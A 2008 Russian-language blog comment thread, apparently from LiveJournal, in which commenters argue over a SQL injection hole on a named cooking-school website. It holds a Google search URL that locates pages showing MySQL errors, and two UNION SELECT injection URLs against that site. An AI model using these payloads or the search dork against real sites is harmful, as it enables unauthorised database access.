November 2019

S M T W T F S
      12
34 5 678 9
10111213141516
17181920212223
24252627282930

Style Credit

Expand Cut Tags

No cut tags
Saturday, August 30th, 2008 09:28 am (UTC)
И?
http://www.google.ru/search?hl=ru&q=%22You+have+an+error+in+your+SQL+syntax%3B+check+the+manual+that+corresponds+to+your+MySQL+server+version%22&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=&aq=f&oq=
Saturday, August 30th, 2008 10:19 am (UTC)
а вот, например - http://www.cooksacademy.com/course.php?intCategoryID=87+union+select+null,NOW(),null,null,null,null,null,null
или вот - http://www.cooksacademy.com/course.php?intCategoryID=87+union+select+null,USER(),null,null,null,null,null,null

это не просто SQL Injection, это "заходи, кто хочешь, бери, что хочешь" :)
Saturday, August 30th, 2008 10:25 am (UTC)
И?
Если подумать и чуть-чуть подправить мою ссылку - можно получить ещё десяток тысяч таких сайтов. Это какая-то новость для кого-то? Если cooksacademy для Вас чем-то особенный сайт - написали бы его владельцам, чтобы они поправили. Если просто ещё один из - я не понимаю восторга.
Saturday, August 30th, 2008 11:59 am (UTC)
ну и что это тебе дало? набор рецептов? телефонный справочник?
Saturday, August 30th, 2008 12:06 pm (UTC)
А теперь посмотри вниз страницы. Realex Secure Payment System. Visa, MC, AmEx. Как ты думаешь, где они хранят данные от онлайновых заказов?
Saturday, August 30th, 2008 12:08 pm (UTC)
я это сразу посмотрел - платежи принимает отдельная система.
так что ценность от этого injection не больше чем от найденного на дороге каталога.
Saturday, August 30th, 2008 12:16 pm (UTC)
да даже если и отдельна система - это ж не повод _так_ писать программы, правда? :)